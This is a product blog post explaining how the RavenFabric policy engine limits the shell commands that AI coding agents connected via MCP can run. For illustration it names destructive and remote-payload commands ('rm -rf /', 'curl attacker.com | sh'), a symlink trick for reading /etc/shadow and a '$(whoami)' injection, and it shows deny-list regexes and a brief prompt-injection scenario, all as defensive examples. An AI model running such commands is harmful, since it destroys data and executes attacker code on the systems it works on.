How RavenFabric Stops AI Agents from Running rm -rf /

May 6, 2026 · 7 min read

AI coding agents are incredible. Claude, GPT, Cursor, Aider — they write code, run tests, deploy applications. But they also run shell commands. On your production servers. With whatever permissions they happen to have.

What happens when an AI agent hallucinates a destructive command?

The industry's answer so far has been "ask the user to confirm." A modal dialog. A y/n prompt. But that assumes a human is watching. In autonomous workflows — CI/CD pipelines, overnight batch jobs, MCP-connected AI assistants — nobody is watching.

RavenFabric takes a different approach: deny by default, allow by policy, enforce at the agent.

The Threat Model

Consider an AI agent connected to your infrastructure via MCP (Model Context Protocol). It has access to an exec tool that runs shell commands remotely. The agent is helpful — it deploys your code, checks logs, restarts services. Until it doesn't.

Failure modes aren't hypothetical:

Hallucinated commands — the model generates rm -rf /tmp when it meant rm -rf /tmp/build-cache, but the path was wrong
Prompt injection — a user's code comment contains instructions that manipulate the AI into running curl attacker.com | sh
Over-eager cleanup — the agent decides to "clean up" by removing files it doesn't recognize
Privilege escalation — the agent discovers it can sudo and starts "fixing" things

Traditional access control (Unix permissions, sudo rules) wasn't designed for this. It answers "can this user do this?" but not "should this action happen given the current context, intent, and blast radius?"

RavenFabric's Policy Engine

Every command that executes through RavenFabric passes through a deny-by-default policy engine. Nothing runs unless explicitly allowed:

apiVersion: ravenfabric.io/v1alpha1
kind: RPCPolicy
metadata:
  name: ai-agent-restricted
spec:
  commands:
    allow:
      - pattern: "^git -C /workspace .*"
      - pattern: "^npm (ci|test|run build|run lint)$"
      - pattern: "^systemctl (status|restart) myapp$"
    deny:
      - pattern: ".*rm.*-rf.*"
      - pattern: "^sudo .*"
      - pattern: ".*curl.*\\|.*sh.*"
      - pattern: ".*secret.*"
  filesystem:
    allow:
      - path: /workspace
        operations: [read, write, list]
    deny:
      - path: /etc
      - path: /root
      - path: /var/log
  resources:
    maxOutputBytes: 10485760
    taskTimeoutSeconds: 300

This policy allows the AI to work within /workspace, run git, npm, and restart a specific service. Everything else is denied. Not by convention — by enforcement.

Two Checks, Not One

RavenFabric doesn't rely on a single policy check. The architecture enforces two independent checks:

Controller pre-flight — before the command is even sent to the target agent, the orchestrator validates it against policy. This catches obvious violations early and provides fast feedback.
Agent-local enforcement — the agent on the target machine re-checks the command against its own policy copy. Even if the orchestrator is compromised, the agent refuses unauthorized commands.

The agent is always the final authority. A compromised controller, a manipulated client, or a prompt-injected AI cannot override the agent's local policy.

Pattern Matching: Regex with Deny-Wins

Policy rules use regex patterns. The evaluation is straightforward:

Check deny list first — if any deny pattern matches, reject immediately
Check allow list — if any allow pattern matches, permit
Default deny — if nothing matches, reject

Deny always wins. You can't accidentally allow rm -rf by adding an overly broad allow rule if there's a deny pattern catching it. This is the same principle as firewall rules: explicit deny overrides everything.

Shell Injection Prevention

AI agents are particularly susceptible to shell injection because they construct commands from natural language. Consider:

# User asks: "check the status of the service named $(whoami)"
# AI generates: systemctl status $(whoami)
# Shell expands: systemctl status root

RavenFabric's policy engine inspects the literal command string before shell expansion. It also detects common injection patterns:

Backtick substitution: `command`
Dollar substitution: $(command)
Pipe chains: safe-cmd | malicious-cmd
Semicolons: safe-cmd; malicious-cmd
Backgrounding: malicious-cmd &

If the policy doesn't explicitly allow pipe characters in a command pattern, they're rejected. The AI can't construct an injection that the policy engine hasn't anticipated.

Resource Limits: Containing Blast Radius

Even allowed commands are constrained:

Output size limit — prevents an AI from running cat /dev/urandom or dumping a 10GB log file into its context window
Execution timeout — no command runs forever. A hung process is killed after the configured timeout
Filesystem boundaries — symlink resolution before path checks prevents ln -s /etc/shadow /workspace/shadow && cat /workspace/shadow

Audit: Everything is Logged

Every command — allowed or denied — produces a structured audit entry:

{"timestamp":"2026-05-06T14:23:01Z","action":"exec",
 "command":"rm -rf /tmp/cache","result":"denied",
 "reason":"matches deny pattern: .*rm.*-rf.*",
 "caller":"ai-agent-mcp-session-7f3a","agent":"prod-web-01"}

This creates an immutable trail. When an AI agent misbehaves, you can reconstruct exactly what it attempted, when, and why it was stopped. The audit log is append-only — even a compromised agent cannot delete evidence.

MCP Integration

RavenFabric's MCP server (rf-mcp-server) integrates directly with AI assistants. The AI sees tools like rf_exec, rf_file_read, rf_file_write. Behind the scenes, every call goes through the full policy stack:

# AI calls rf_exec("rm -rf /tmp")
# → Policy check: DENIED (matches deny pattern)
# → AI receives: {"error": "command denied by policy"}
# → AI adapts: tries a different, allowed approach

The AI learns from denials. It adapts. It doesn't crash or lose context — it receives a clear error and adjusts its strategy. This is how guardrails should work: not by removing capability, but by bounding it.

Behavioral Anomaly Detection

Static policy catches known-bad patterns. But what about novel attacks? RavenFabric includes behavioral anomaly detection that scores actions across four dimensions:

Velocity — sudden spike in command frequency (possible automated attack)
Novelty — commands never seen from this caller before
Timing — actions outside normal operating hours
Escalation — progressive broadening of access (reconnaissance pattern)

When the combined anomaly score exceeds a threshold, capabilities are automatically reduced until a human operator reviews the situation.

The Result

An AI agent connected to RavenFabric can be productive — running builds, deploying code, checking logs — without being dangerous. The policy engine is the boundary between "helpful" and "harmful." It's not a suggestion or a convention. It's enforcement.

No rm -rf /. No sudo bash. No curl evil.com | sh. Not because the AI chose not to — because the system won't let it. Policy is physics, not etiquette.

← Back to all posts